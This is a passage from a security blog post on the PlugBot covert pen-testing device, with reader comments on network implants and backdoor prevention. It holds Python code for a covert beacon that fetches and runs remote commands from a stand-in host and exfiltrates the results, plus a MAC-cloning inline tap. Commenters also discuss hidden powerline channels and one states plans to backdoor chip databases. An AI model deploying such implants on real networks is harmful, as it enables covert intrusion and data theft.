PlugBot

Interesting:

PlugBot is a hardware bot. It’s a covert penetration-testing device designed for use during physical penetration tests. PlugBot is a tiny computer that looks like a power adapter; this small size allows it to go physically undetected, all the while being powerful enough to scan, collect, and deliver test results externally.

How do you use it?

Gain access to the target location (a conference room?), plug the PlugBot into the nearest wall outlet, and walk out. The PlugBot is configured to make an external connection (Wi-Fi or Ethernet) to a specified IP address to receive instructions. Central Command allows the penetration tester to invoke scripts and applications. Output from the testing is encrypted and securely transmitted to the Drop Zone, where the data is imported into Central Command for analysis by the pen tester.
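In pseudocode terms, the described workflow amounts to a simple poll-run-deliver loop. The sketch below (Python) is only illustrative; the command-server and drop-zone URLs, the job format, and the polling interval are assumptions, not details from the PlugBot site, and TLS stands in for whatever payload encryption the real device would use.

```python
# Hypothetical sketch of the "phone home" loop described above: poll a
# command server for a job, run it, and ship the output to a drop zone.
# URLs, job format, and the shell-out are illustrative assumptions only.
import json
import subprocess
import time
import urllib.request

COMMAND_URL = "https://pentester.example/central-command/next-job"   # hypothetical
DROPZONE_URL = "https://pentester.example/drop-zone/upload"          # hypothetical

def fetch_job():
    with urllib.request.urlopen(COMMAND_URL, timeout=30) as resp:
        return json.load(resp)   # e.g. {"id": 7, "cmd": ["nmap", "-sn", "10.0.0.0/24"]}

def run_job(job):
    out = subprocess.run(job["cmd"], capture_output=True, timeout=600)
    return out.stdout + out.stderr

def deliver(job_id, output):
    # A real device would encrypt the payload itself; here TLS stands in for that.
    req = urllib.request.Request(
        DROPZONE_URL,
        data=json.dumps({"id": job_id,
                         "output": output.decode(errors="replace")}).encode(),
        headers={"Content-Type": "application/json"},
    )
    urllib.request.urlopen(req, timeout=30)

while True:
    try:
        job = fetch_job()
        if job:
            deliver(job["id"], run_job(job))
    except Exception:
        pass                     # stay quiet and retry later
    time.sleep(300)              # low-and-slow polling interval
```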

Note that it has a squid logo.

Posted on December 24, 2010 at 1:14 PM • 45 Comments

Comments

Stephan Zielinski December 24, 2010 2:00 PM

Er… the actual device does not exist yet, and may never exist. The image is a mock-up, and whoever’s working on making it a reality considers setting up a twitter account for it noteworthy enough to merit a mention on the “Updates” page.

Dennis December 24, 2010 2:02 PM

This is interesting, but the website seems to be light on details, unless I’m missing something. “Performs vulnerability tests” is very vague. Also, it is unclear whether the device is able to handle connecting to networks with any type of certificate security. It says it is running Linux, so maybe this is a non-issue, but still, it could be a very lightweight version missing some key features.

Brandioch Conner December 24, 2010 2:02 PM

From that site:
“PlugBot is a hardware botnet project.”

I’m more familiar with “botnet” meaning “zombies”.

“Covertly disguised as power adapter”

Not from the picture they’ve posted. It looks like it still takes a standard RJ45 plug. Maybe if they had a special data cable that resembled a regular wall-wart power cord …

How about a device that sits in-line with a regular data cable and steals the MAC address and IP address of the up-stream system?

Johnny December 24, 2010 2:36 PM

Very vague. Penetration testing? Does that mean you need to gain physical access to the network and plug an Ethernet cable into the PlugBot? That’s very conspicuous. Or does it perhaps use its wireless adapter for penetration attempts into the target network?

I think a quality microphone would be great too so you can relay overheard conversations.

Davi Ottenheimer December 24, 2010 3:08 PM

Note comment #7 from Scientific American

“7. gmperkins 07:07 PM 5/2/09

Good but not suprising answers.

But why are they called hackers? I'd figure a hacker would say: "Sneak into a building, plug it into a socket and their network, use it to monitor their network traffice/whatever"

That brick would be ideal for espionage."

tim December 24, 2010 3:20 PM

This is where good security architecture comes into play. A testing tool like a plugbot would be useless within our facilities.

However – most companies send their default route right out through the firewall, allow anything to be connected to the network, and allow anything to browse the internet. So I could see the utility there.

(I’d buy one, if it were available, just to play with it.)

Nick P December 24, 2010 3:52 PM

Nothing new. We’ve been doing this trick for a while with embedded boards and laptops. Aside from crypto, it’s actually why I loved the VIA Artigo: tiny, low power, and price makes it disposable. Just connect to their network, esp ethernet, in some hidden spot. The data is sent to a nearby PC, maybe another embedded board hidden in an accessible location with good antenna. The outside unit can passively accept data from the inside unit or actively relay instructions from the operator, who connects with his notebook via wired or wireless connection. The latter can reduce risk of exposing outside unit’s location. Point-to-point infrared connections and rarely monitored spectrum can reduce detection probability.

Joe December 24, 2010 5:14 PM

If you really want interesting information, make something that can fit covertly on a coffee maker or water cooler. Then have it send the audio to a remote site.

Michael Hunter December 24, 2010 5:29 PM

As others have mentioned, it looks like a plug computer with some software on it. It is small, but in all the conference rooms I’ve used, power is at a premium (people tend to want to always plug in their mobile computer). Also, the way to get the data out is shaky. You have to either get on corporate wifi (not always available, or sometimes needing authentication) or get a physical connection (and still need to get past any port authentication), which reduces your “cover”.

How about hiding in plain sight and using cell technology, maybe one of the Chrome laptops? Leave it in a conference room corner and walk out. It can scan the world as far as it can reach and push the information back upstream via the Qualcomm Gobi chip. You could even steal a wired connection and not look out of place.

Imperfect Citizen December 24, 2010 8:01 PM

I’m going to look around for those things in my house. We moved and an observer said it was only a 3 hour job to set up our house even with the security perimeter too. Something about a wireless frequency and the house is like an antenna? I don’t know what that meant. I did hear that my job was renewed for another year.

Cornerstone December 24, 2010 9:36 PM

It would be better if it looked like a camera battery charger with a slot for a battery and a flashing LED. That way someone needing the plug might not just pull it out in order to use the plug.

Marc W. December 24, 2010 10:14 PM

As far as hiding in a conference room/outlet issues — seems like the easiest thing to do would be to install it inside a surge protector strip, no? As long as the extra outlets were functional I wouldn’t imagine anyone turning it off or throwing it away. Also it would provide an excuse for any “suspicious” alternative ports and connections.

Carl December 24, 2010 11:42 PM

Can’t really do much more than what you could do sitting in the parking lot with a laptop, can it? Unless it has a microphone and/or web cam (which it doesn’t seem to have). Most outfits have secured their Wi-Fi. I guess if you could design one that looked like some kind of RJ45 cover/adapter and you could figure out how to power it, you could plug in and sniff the interior traffic. Sort of like this:
http://www.computerworld.com/s/article/9136179/Fake_ATM_doesn_t_last_long_at_hacker_meet
or this:
http://www.msnbc.msn.com/id/27085818/

Clive Robinson December 25, 2010 7:07 AM

@ Nick P,

“Nothing new. We’ve been doing this trick for a while with embedded boards and laptops. ”

Yup,

I used to put them under the false floor. Thanks to the “set in floor” plates with power outlet, network and phone, it’s the work of just a few minutes to replace the whole unit with a small computer, modem etc. all bolted on the underside.

The trick to remember is to use two network interfaces where the MACs are fully programmable.

You then program the “upstream port” with the “downstream device” MAC and the “downstream port” with the “upstream device” (switch/router/server) MAC. And if you want to do it properly you need a multipole relay and control circuit on the ports, so when the tech comes around to check the line etc. it switches the device out of circuit, making it electrically invisible when the security people “walk the line”. Few, even the more paranoid of security techs, ever do a full visual check along all the cables etc. due to the cost (even in max-security areas they don’t do it; instead they often opt for pressurised conduit as a cheaper option, but that’s not as hard to bypass as people think).
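For illustration, on a modern Linux box the MAC-cloning and transparent-bridging part might look roughly like the sketch below. The interface names, MAC addresses and bridge name are assumptions, and the relay/bypass hardware is obviously not shown.

```python
# Sketch of the dual-interface MAC cloning described above, assuming a
# Linux box with the `ip` tool available. Interface names and MACs are
# examples only.
import subprocess

UPSTREAM_IF = "eth0"     # faces the switch/router
DOWNSTREAM_IF = "eth1"   # faces the legitimate device (e.g. the desktop)

UPSTREAM_DEVICE_MAC = "00:11:22:33:44:55"    # switch-side MAC, learned passively
DOWNSTREAM_DEVICE_MAC = "66:77:88:99:aa:bb"  # MAC of the downstream desktop

def sh(*args):
    subprocess.run(args, check=True)

# Upstream port wears the downstream device's MAC, and vice versa.
for iface, mac in ((UPSTREAM_IF, DOWNSTREAM_DEVICE_MAC),
                   (DOWNSTREAM_IF, UPSTREAM_DEVICE_MAC)):
    sh("ip", "link", "set", "dev", iface, "down")
    sh("ip", "link", "set", "dev", iface, "address", mac)   # clone the MAC
    sh("ip", "link", "set", "dev", iface, "up")

# Bridge the two ports so traffic passes through transparently while the
# tap can also observe it (bridge name is arbitrary).
sh("ip", "link", "add", "name", "br0", "type", "bridge")
for iface in (UPSTREAM_IF, DOWNSTREAM_IF):
    sh("ip", "link", "set", "dev", iface, "master", "br0")
sh("ip", "link", "set", "dev", "br0", "up")
```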

With the advent of the “gumstick” Linux micros with dual network ports and micro-USB Wi-Fi etc. dongles, I’ve been thinking of making one to fit on the back of a standard wall outlet face plate…

Dave December 25, 2010 7:17 AM

“Er… the actual device does not exist yet, and may never exist.”

Actually it does exist; it’s a Marvell SheevaPlug (or one of its many derivatives). So this is basically a COTS product combined with a fancy press release. Here’s a link to the plug computing wiki for those who are interested: http://computingplugs.com/index.php/Main_Page.

Dirk Praet December 25, 2010 2:40 PM

Interesting PoC, but probably of little use to anyone but insiders in network environments with MAC-address access control on routers & switches, EAP/DHCP authentication and the like. Even with two programmable (spoofable) NICs, it would still be a challenge.

Seiran December 25, 2010 3:42 PM

A problem with these devices is that they are troublesome if (when?) discovered by someone who knows what they are, and they are not generally available off-the-shelf.

For a quick, inconspicuous and easily explainable backdoor into a network, the Apple AirPort Express or AirPort Extreme is an easy option. Users are always installing wireless devices even when they are told not to, and the cute design that screams “I’M A CONSUMER DEVICE!!” suggests this explanation. I had a personal hotspot in the library for months until one of my extra routers was discovered.

The AirPort Express looks like a Mac power adapter. Power plugs are hard to find in many places, but you’re sure to find one behind the Redbox, near the Power Card station at Dave & Busters and behind ATMs, right next to the convenient Ethernet jack. Everything you need to plug in and get to work on your important business.

RobertT December 26, 2010 9:06 PM

I’ve noticed that nobody has mentioned “powerline” modems as a data back haul option.

In the last few years this technology has really taken off and there are a lot of possibilities. Basically your options are narrowband (40 kHz to 480 kHz) or broadband (2 MHz – 30 MHz).

The broadband systems can support very high data rates (over 100 Mbps) but are easy to detect due to RFI and have limited range.

The narrowband systems can have a range of up to 1000 m at data rates of up to 2 Mbps. Narrowband systems are VERY difficult to detect from RFI; you actually need to do a spectrum analysis of the AC line. Since the modern narrowband systems use OFDM (about 100 carriers) with the data typically 8-DPSK (sometimes 16-QAM), it is VERY VERY difficult to detect the existence of a narrowband powerline modem. It all just looks like a noisy AC signal (which is not unusual); most techs seeing this AC-line noise would suspect a failed filter cap in a switched-mode power supply rather than intentional communications. Some narrowband systems have a feature to automatically configure as a multi-hop modem. This lets you make the TX power at the origin very low. With narrowband systems it is also possible to retrofit the MV=>LV AC transformer with a coupler so that you can monitor the MV side from a respectable distance (important in the US due to 110 VAC).
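A toy numpy sketch of the general idea: about 100 OFDM sub-carriers between 40 kHz and 480 kHz, each carrying differential 8-PSK, generated well below a synthetic line-noise floor. All parameters here are illustrative assumptions, not taken from any real powerline standard.

```python
import numpy as np

# Toy illustration of the narrowband scheme described above: ~100 OFDM
# sub-carriers between 40 kHz and 480 kHz, each carrying differential
# 8-PSK, buried about 10 dB under a synthetic line-noise floor.
FS = 1_200_000            # sample rate in Hz
N_CARRIERS = 100
SYMBOL_LEN = 4096         # samples per OFDM symbol
carrier_freqs = np.linspace(40e3, 480e3, N_CARRIERS)

def dpsk8_phases(bits):
    """Differential 8-PSK: each 3 bits select a phase step; phase accumulates."""
    steps = (bits.reshape(-1, 3) @ np.array([4, 2, 1])) * (2 * np.pi / 8)
    return np.cumsum(steps)

def modulate(bitstream):
    per_carrier = bitstream.reshape(N_CARRIERS, -1)
    n_sym = per_carrier.shape[1] // 3
    t = np.arange(SYMBOL_LEN) / FS
    signal = np.zeros(n_sym * SYMBOL_LEN)
    for f, bits in zip(carrier_freqs, per_carrier):
        for k, phase in enumerate(dpsk8_phases(bits[: n_sym * 3])):
            sl = slice(k * SYMBOL_LEN, (k + 1) * SYMBOL_LEN)
            signal[sl] += np.cos(2 * np.pi * f * t + phase)
    return signal / N_CARRIERS

rng = np.random.default_rng(0)
tx = modulate(rng.integers(0, 2, N_CARRIERS * 3 * 8))    # 8 symbols per carrier
noise = rng.normal(0.0, 1.0, tx.size)                    # stand-in for AC line noise
scale = 10 ** (-10 / 20) * np.std(noise) / np.std(tx)    # carriers ~10 dB below the noise
line = noise + tx * scale
print("carrier power relative to noise: %.1f dB"
      % (20 * np.log10(np.std(tx * scale) / np.std(noise))))
```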

Clive Robinson December 27, 2010 10:55 AM

@ Robert T,

As Nick P once said to me,

“Don’t give away all the trade secrets” 😉

I used to find that powerline was not too good in some places (think analog power-factor correction), so I used to dump a DS-SS signal in the AM band on top of the local strongest station; usually it would close-couple and find its way out of a building somehow.

On a spectrum analyser the DS-SS looked like transmitter grass on the AM station (quite common on US stations back then), and on a typical “bug hunter” of the time it would come up as the AM station due to the bandwidth limitations of the equipment.

Typically the thing that would find it in a skilled tech’s hands was a “diode probe” type receiver that had the bandwidth and no demod filters and circuits to get in the way. Then a spectrum analyser and a suspicious mind might reveal what was going on, but as it was on the power wiring and usually the structural steel as well, it was not that easy to find even then.

Since then the likes of R&S have put suitable filters in their specialised RX kit and it’s less difficult to find.

bob (the original bob) December 27, 2010 12:49 PM

I think it should have a flowery logo on it and have a commercially available scent oil cartridge in it. Put wording on it “change every 90 days” so people think it is supposed to be there.

RobertT December 27, 2010 8:25 PM

@Clive,
for frequencies below 500 kHz power-factor-correction caps are a big problem, but not an impossible problem. You need to change the modulation and use OFDM. The presence of a PFC cap will make DSSS impossible to equalize, so you get killed by ISI.

Regarding Modulation:
BPSK modulation is completely ruined by PFC caps, but differential PSK modulations work OK (try Bluetooth 2’s π/4-DPSK). OFDM will also keep some of the channels unmodulated so that noise and EQ can be measured (approximated) for that region.

Detecting this signal is VERY difficult, especially at the lower frequencies, because the AC mains make a very inefficient antenna at 100 kHz (especially in the US). The systems that I have seen all use carriers at about 10 dB below the system noise floor, so the modulation only shows up as an increase in the noise floor over a certain frequency range. Because it is AC mains you cannot turn it off and get a measure of the line noise with and without modulation, so all you see is a slightly higher than expected noise bump. These days, if you are trying to hide, then hiding behind the noise of typical computer switched-mode power supplies is much better than using the AM stations. Even when a tech finds a signal, in a typical office there are 100 other local signal sources that all look similar.

Nick P December 31, 2010 5:35 PM

@ Jesse Krembs

Seems to be a lot of that going around. The Tor router is a good example of research into an already-solved problem. I don’t mind a set of diverse solutions, but things like this are just wasteful redundancy. That’s just… annoying.

Clive Robinson January 1, 2011 4:31 AM

Nick P,

“I don’t mind a set of diverse solutions, but things like this are just wasteful redundancy”

Only if one is “ripping” the other,

The problem with this sort of device is the developers, and it is one that RobertT identifies over in the “Did the FBI Backdoor OpenBSD?” thread:

“Now here’s the real conundrum, if you find this magical person [top flight developer] what makes you believe, for one second, that they won’t intentionally backdoor the system? They are probably a narcissist, so they’ll feel compelled to add a complex backdoor, just to prove how smart they are!”

Thus if you have two similar products from different developers, made from the same FOSS source code modules, you may well be able to check the binaries against each other to see if one has put in a subtle backdoor etc. Which could be very valuable knowledge…

The thing is, though, it’s not only the “narcissistic developer” you have to worry about, it’s all developers that are any good…

Because it’s the inquiring mind, tempered by different experiences that produce the different outlook, that sees the potential for a backdoor where others either don’t or have not yet thought of it. And their outlook may just make them think putting a backdoor in is an investment in uncertain times, and thus “the ace up the sleeve” in the game of life.

One of the odd things about the noncommercial secure code development model is that in some respects it is “upside down” when compared to run-of-the-mill commercial code development.

For instance “code review”: in most “code shops” this is not done by the best developers or those developers with a knack for finding bugs, as these people are seen as too valuable to waste on such nonprofit activities. Likewise for those in “test”, testing the code for functionality before release to the customers. Even if one of the best developers wanted to do code review or test thoroughly, “short-term shareholder value” skews the pay and benefits model against them and in other ways prevents this from happening. In many places code review looks only at user functionality, not at finding “backdoors”.

The result is any capable developer with a little forethought can get a backdoor past the “code review” team with little difficulty (as I have demonstrated in the past).

But worse, they can also get it into the final code base that gets “tested” and then signed off with that all-important seal of approval, the private key used to allow the code to be loaded as “good” by the end user.

Although I have been saying this for several years it is only with Stuxnet that it’s become suddenly obvious to people and they are starting to look.

And what have we found so far? Well,

We are seeing application developers for apps on various smartphones putting very obvious “ET phone home” code in their products. Sometimes just as vanity kickers so the developer can see their code is being used, sometimes for more sinister reasons.

Oops, this stuff is completely unhidden and we are just finding it…

However, with real money to be made these days, covert backdooring of the systems ordinary people use to speak to their bank or other financial institutions has, I think you can see, some potential…

But it does not end there. Devices such as these “Spy-warts”(TM) are “dual use”, and the “legal users” don’t want the “targets” of their investigations to know they are being observed. Likewise the opposite is true: the “illegal/questionable” users don’t want their “targets” to know either. In either case the “target” is losing information that is valuable to them, and where there is value it can be capitalised on by other people.

But it goes on from there: where there is valuable information it is also usually mutable, and thus can be changed, unbeknown to the “target”, by the “observer” deploying the tool. But with a backdoor it can also be changed by the designer of the tool, unbeknown to both the observer and the target. Thus opening up some very interesting avenues for capitalisation…

This is something I also bang on about with covert botnets started by fire-and-forget malware, which although it technically falls into the definition of “APT” is way, way more dangerous than the APT hawks appear to realise.

A lesson from history is that where there is conflict there are arms manufacturers making the “tools” of war and making a nice profit. As we know, both sides buy these “tools” to fight each other; thus, like the “crack addict”, they are at the wrong end of the deal and very dependent on their supplier.

Sometimes both sides buy from the same manufacturer… Which puts the manufacturer in a position where they can influence the progress and outcome of the conflict to their own advantage…

However, such advantage only works in a way that is observable, thus the effects are generally limited (otherwise the manufacturer would go out of business).

However, when it comes to information warfare, we know from some of the “Ultra” history just how useful information is; it can be the “hidden hand of fate” which brings misfortune to an otherwise superior belligerent and luck to the inferior side. And information, not being physical, is a resource that can be used over and over almost limitlessly.

We know from things like “The Man Who Never Was” that false information put in the right place at the right time can have very major and significant outcomes. And it is said that the CIA was responsible for a major disaster in Russia that had significant economic effect. Then there is Stuxnet caught almost by chance…

Now start thinking on what economic advantage such behaviour would be to various companies small and large. And what financial gain could be made sitting on the wall as an unknown “insider trader”…

Thus if these “spy-wart” devices are not backdoored, the developers are potentially a little behind the curve…

Nick P January 2, 2011 5:48 PM

@ Clive

Over the past year, I’ve been looking into ways of preventing backdoors. The best alternative I’ve seen to formal verification is a methodology that starts with precise requirements, then matches specs to requirements in a step-wise revision that gets more concrete at each level. Each more concrete step is connected in the SCM system to the more abstract function, module or spec above it and they are proven to correspond to each other via formal or informal arguments.

Formal examples using this approach include LOCK, GEMSOS, Integrity-178B, and seL4. Best informal examples include DO-178B requirements-spec-code mapping and the Cleanroom methodology. In each case, decomposition is used to break the application into functions/components of increasing granularity. The correspondence mapping ensures that the requirements are met and no extra functionality is introduced.

A simplified example would be breaking a function UpdateRecord(User,Balance) into subfunctions/subsections ConnectToDatabase(), SendDataToDB(User,Balance), and CloseDatabase(). A reviewer who knows the definition of the subfunctions can look at how they are used to ensure they collectively meet the purpose of “UpdateRecord(User,Balance)”. Each subfunction will further be decomposed until the functionality is very simply verified. This eliminates easter eggs, too. It would be strange seeing code for a game engine or command shell in one of these routines. Hence, the advantage in preventing backdoors.
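As a toy Python rendering of that decomposition (the sqlite usage is just a stand-in for “the database”, and the names mirror the example above):

```python
# Toy rendering of the stepwise decomposition described above. Each
# subfunction is small enough to review against its stated purpose; the
# reviewer then checks that update_record does nothing beyond composing them.
import sqlite3

def connect_to_database(path="accounts.db"):
    """Open the account store; nothing else."""
    return sqlite3.connect(path)

def send_data_to_db(conn, user, balance):
    """Write exactly one balance value for exactly one user."""
    conn.execute("UPDATE accounts SET balance = ? WHERE user = ?", (balance, user))
    conn.commit()

def close_database(conn):
    conn.close()

def update_record(user, balance):
    """Requirement: persist `balance` for `user`, and do nothing else."""
    conn = connect_to_database()
    try:
        send_data_to_db(conn, user, balance)
    finally:
        close_database(conn)
```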

Another thing is how to handle the teams. The teams should be familiar with the right principles in architecture, design, testing, and coding. They should take a literate, modular, verifiable approach to coding. I think instead of having one team constantly programming and one constantly verifying, they should be swapped after each project or big section of a large project. This will ensure they are good at both tasks, preventing the worst developers from being on verification team. Might also measure who the best designers and bug hunters are and ensure at least one of each is on the proper team. I’d also have the best verifier watch the best developer’s work more carefully. 😉 The overall strategy I’ve presented should do more than prevent backdoors: expect increases in requirements met, reduction in testing, and improved quality in general. Cleanroom was scientifically proven to meet these claims, which is why most big RTOS vendors are using it for middleware development.

RobertT January 2, 2011 9:25 PM

NickP
I like what you are trying to do, because I’m a big believer in “formal verification” especially at the product definition and development level. I’m also a big fan of “compliance matrix testing” at the product level. Unfortunately focusing on the technical side of the security process ignores the weakest link, which is the people involved in the process.

Within chip development teams there is an unending supply of cerebral narcissists; the higher you climb, the more prevalent they become, and it is almost a predilection for the job. Now what balances the team is the Inverted Narcissist, especially when the co-dependent is really the smarter of the two. The real trick is to construct a project where the Inverted Narcissist actually controls sign-off but the Classic Narcissist gets the glory. The reason this is important is that it puts the Classic into the role of the co-dependent, so that the classic Narcissist supports the Inverted. Unlike the Classic, the Inverted achieves glory in perfection; only that which can stand the review of the Classic is in any way “good enough”.

That’s enough Psych 101, but I would respectfully suggest that as you strive for real EAL7 performance you will need to delve deeper into the psyche of your developers.

Clive Robinson January 2, 2011 9:35 PM

Nick P,

“Each subfunction will further be decomposed until the functionality is very simply verified.”

Yup, I’m with you on that one, and all the process leading up to it.

If you remember, one of my gripes about modern apps is the monolithic code block creating the unverifiable app, usually written by code cutters who for various reasons don’t have the “security chops”.

The solution I suggested was that common functionality be broken down into individual functions of a “*nix ethos” scripting language by those with the “security chops”, and that in addition each function would have a signature profile that could be observed by a security hypervisor.

Thus code cutters could continue to cut apps but they would not have to worry about security at the lower levels. Further, the signature profile of the application script gets built automatically by the script “compile” or by the interpreter loader for the security hypervisor.

There would of course be some downsides for the code cutters; they would have to follow certain coding rules. However, I don’t think they are really any more onerous than those for cutting “thread safe” code for multiprocessor shared-memory applications.

If you remember, I then took the thought process forward to come up with the “prison-v-castle” idea, such that each subfunction runs in its own just-sufficient environment (prison) with communications between subfunctions mediated and controlled by the security hypervisor (warden).

I’ve recently been modelling this using a modified “thread library” where the thread context switching can be done pre-emptively via a timer interrupt, which occasionally runs a hypervisor to scan one of the “thread process spaces” to do “probabilistic detection” of abnormal behaviour by checking the code memory hash and heap-space signatures. It is showing some promise, but you do get a performance hit. One way to reduce this is to scan either the thread that is to be pre-empted or the pre-empting thread.

Scanning the (old) thread that is to be pre-empted allows you, with a little forethought, to catch program bugs as well, such as logic errors where the stack grows unreasonably or loops are not exiting within a reasonable number of iterations.

Scanning the (new) thread that is pre-empting allows you to check for malware injected from another thread or process prior to it being run. Provided you have the inter-thread comms suitably arranged, you just reload the thread code and clean out its stack, which has a similar hit to a page fault.
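To make the scan step concrete, here is a crude user-space analogue in Python: a “warden” thread periodically re-hashes each worker’s code object against a baseline taken at load time. A real implementation would sit below the threads in the hypervisor and also check stack and heap signatures; this only illustrates the hash-and-compare idea.

```python
# Crude user-space analogue of the "warden" check described above: the
# watchdog re-hashes each worker's code and compares against a baseline.
import hashlib
import threading
import time

def code_hash(fn):
    return hashlib.sha256(fn.__code__.co_code).hexdigest()

def worker():
    while True:
        time.sleep(1)          # stand-in for real work

WORKERS = {"worker": worker}
BASELINE = {name: code_hash(fn) for name, fn in WORKERS.items()}   # taken at "load"

def warden(interval=3):
    while True:
        time.sleep(interval)
        for name, fn in WORKERS.items():
            if code_hash(fn) != BASELINE[name]:
                print(f"ALERT: code for {name} no longer matches its baseline")

threading.Thread(target=worker, daemon=True).start()
threading.Thread(target=warden, daemon=True).start()

time.sleep(4)
WORKERS["worker"] = (lambda: None)   # simulate the code being swapped out under us
time.sleep(4)                        # warden's next scan reports the mismatch
```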

One of these days I’ll stop having fun fiddling with it and knock it into shape as more than just an ideas test bed.

Clive Robinson January 2, 2011 10:08 PM

@ Robert T,

With regard to the dependence on code cutters…

I mentioned in the past that I found code quality improved by making the annual bonus based on bugs found in other people’s code, several years ago (actually last century…).

That is, the bonus starting point was based on the usual management productivity measures of the time (lines of working code, sub-functions completed, milestones/targets met, etc.). But on top of this I put a points system where you got points for finding bugs in others’ code, which got taken away from the writer of the bug. The number of points (up to 3) for each bug was decided by the other members of the team.

About 1/3rd of the bonus pot was awarded based on the number of points an individual had. There were also small monthly prizes (not useless awards of corporate deskweights).

It was interesting to see the dynamics of the group change. Those who stuck with “vicarious coding” practices (i.e. the more lines of code the better, the less testing the better) got fewer points and moved out of the team; those with more “insightful coding” (i.e. better tested) got slightly better bonuses; but those who had “solid coding” practices did not lose points and usually gained them from others, simply because their code, although produced at a slower rate per line, did not usually require re-work after test.
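For concreteness, the arithmetic of the points part looks something like this; the pot size, baseline points and sample bugs are made-up numbers, not what we actually used:

```python
# Small sketch of the bonus arithmetic described above: each confirmed bug
# moves up to 3 points (as voted by the team) from its author to its finder,
# and one third of the bonus pot is split in proportion to points held.
BONUS_POT = 30_000
points = {"alice": 10, "bob": 10, "carol": 10}   # illustrative starting points

bugs_found = [                                    # (finder, author, points 1-3)
    ("alice", "bob", 3),
    ("carol", "bob", 2),
    ("alice", "carol", 1),
]

for finder, author, pts in bugs_found:
    points[finder] += pts
    points[author] -= pts

points_pool = BONUS_POT / 3                       # the 1/3 awarded on points
total = sum(points.values())
for name, pts in points.items():
    print(name, round(points_pool * pts / total, 2))
```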

RobertT January 2, 2011 10:42 PM

@Clive,

I’m not at all sure how to structure bonuses to achieve quality results.

IMHO the inverted narcissist is the most valuable team member, however he (or often she) is not motivated by personal achievement or wealth accumulation, but rather by achieving perfection in the eyes of the Classic Narcissist. There is a co-dependence relationship between the two so over rewarding one will destroy the symbiosis that makes the pair functional.

The problem is constructing the team dynamic in such a manner that both the Inverted and the Classic see that their needs are met with this apparent role reversal. The other trick is maintaining code-cutting productivity even with this backwards structure, otherwise it is easy to enter a product-definition “forever loop”. It takes a strong manager with a sense of “good enough” to move the team forward.

I guess I’m fortunate that I’ve never needed to look at the Dollars per task metrics!

RobertT January 2, 2011 11:36 PM

@NickP
At the moment my interest is on Mobile computing viruses and ways to inject these viruses into chip definition databases.

For mobile devices, the holy grail, would be to compromise the ARM9 and ARM7 databases. Imagine a worm say like Stuxnet that could identify the ARM source database and modify this at a ‘C-code’ or Verilog level to insert an operation that intentionally leaks information relevant to typical crypto operations. You get side channels built in to ALL derivative products (basically EVERY smart phone) and supported at a level that most apps developers and code-cutters would consider impossible.

All manner of “zero day” attacks would be created, and new ones could be developed whenever an old hardware leak was fixed.

In theory this could all be done without the original developer even realizing that their processor definition database was corrupted!

From my experience most chip databases are only protected by typical Unix group permissions; I’ve never seen private key signing implemented to control the incorporation of new features. Even tracking of source database modifications is rudimentary.

It’s a work in progress….

Clive Robinson January 3, 2011 4:54 AM

@ RobertT,

“From my experience most chip databases are only protected by typical Unix group permissions; I’ve never seen private key signing implemented to control the incorporation of new features. Even tracking of source database modifications is rudimentary.”

Yup and the same applies to just about every change control system and design and manufacturing database I’ve ever worked on.

To be honest I can’t remember many places I’ve worked at on the “electronics side” in the past doing anything at all over and above putting paper copies in a file cabinet. Even the best of them would only go as far as “stick it on a floppy” and “put it in the safe” (usually not A60 fire-resistant). And this was the “final product” of a team of up to twenty different people over a six- to eighteen-month project…

In many places in my early days as an engineer I’d get a “flea in my ear” for “wasting time” if I tried to document a project at its close…

It used to go against the grain, which is why I have in various filing cabinets most of my log books, the design notes, schematics, layouts, mechanical drawings, photoplots, test results, software print-outs etc. in both paper and magnetic media format (yup, there’s eight-hole punch tape, Hollerith cards, eight-inch floppies and other weird storage in there).

At a couple of places I even built DBs around the source code control system to store revision history in. The root trouble, as always, was “proprietary file formats”, and in some cases the only solution was to store either PostScript printer output or another common printer file format such as HPCL. And then there was engineer complacency: “yeah, yeah, I’ll do it tomorrow, can’t you see I’m busy right now!”.

One place I worked at, all the engineering PCs got stolen overnight along with all the various project files on the hard drives; it was a disaster.

To keep things going I brought in two of my own high-end (for the time: 486, 16 MB of memory, QIC tape drives, running Unix) PCs from home and used the backups I’d taken to get my team back up and running.

Believe it or not, other engineers including the chief engineer actually said openly that I must have been involved with the theft as I “had prepared for it”… Then, when in my own defence I pointed out I had always taken “backups home” even before PCs had been thought of, the next thing I know I’m being told it’s company property and somebody could steal company “trade secrets” from my home…

So yes, after having put up with it for over 30 years, I can understand your concern and also why you probably don’t stand much chance of getting the required security unless you are “top dog with real bite”, and even then you will probably be hated for it even in a BSI-9000, Six-Sigma,… …,etc. shop.

Remember the mantra,

The rules are different in R&D,
production and Admin are FQA.
In R&D we slave for our pay,
as marketing dictate our way.
Walnut corridor has us slave,
for the profit shareholders crave.
Time and resources we have none,
Such is the life in R&D.

It might “forewarn you of stormy waters”.

With regards,

“I’ve never seen private key signing implemented”

I used to fall about laughing whenever anybody suggested it as a “security measure”. The reason being that nobody outside a “triple layer armed guard” Mil/TLA facility appears to understand KeyMat issues and just what is involved with key handling. Though Bruce’s comments on this and PKI in the past suggest he has at least considered it to the point of realising just how hard a problem it is.

Then there is the rearwards regression caused by the question “just what are we signing anyway?”

That is, if the preceding steps are vulnerable, what is the “code signing” going to achieve other than the equivalent of a poorly authenticated hash?

Especially when “ease of use” is considered and each developer gets their own copy of the signing key, or it is left at best “group read access” on a server…

The best it can offer, when implemented correctly, is an audit trail back to the signing certificate used to sign a given file, and potentially to the time it was signed and the machine it was signed on.

What it does not do nor can it do is,

1, Attest to the quality of the code.
2, Attest to what real point in time it was signed.
3, Attest to which real person signed.
4, Attest to who originated the file.
5, Attest to who has modified the file.
6, Attest to when the file has been modified.

etc etc, because of rule zero,

0, It does not have nor can it have any verifiable connection with the process or procedures that were used in the file creation or storage.

As an analogy, it’s about the equivalent of me putting the code onto a CD, writing the date I did it and the hash value indelibly on the top, and just putting it on a shelf in the entrance corridor…

Thus to be of use for traceability, code signing has to work like a Russian doll, with every change being the next signed doll outwards and the innermost doll being effectively the signed blank file. Each entity involved needs to have its own signing key; thus each layer is effectively signed at least twice, by the personal key and by the key of the machine it was signed on, etc.

The obvious 20,000 ft way to do this is to build the signing process into a secure revision-control repository which issues each file for modification with a signed token in it, which includes details of who checked the file out, when, and from which revision point. When the file is checked back in it is signed by the system with the personal key of the person making the commit and a time/revision stamp signed by the secure repository. Obviously the secure repository needs to be “append only” etc., etc., etc.
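A minimal sketch of that layering, with HMAC standing in for real public-key signatures and deliberately naive key handling (a real system would keep keys in personal tokens and an HSM, not in source):

```python
# Minimal sketch of the "Russian doll" signing described above: each
# revision wraps the previous signed layer together with who/when/what
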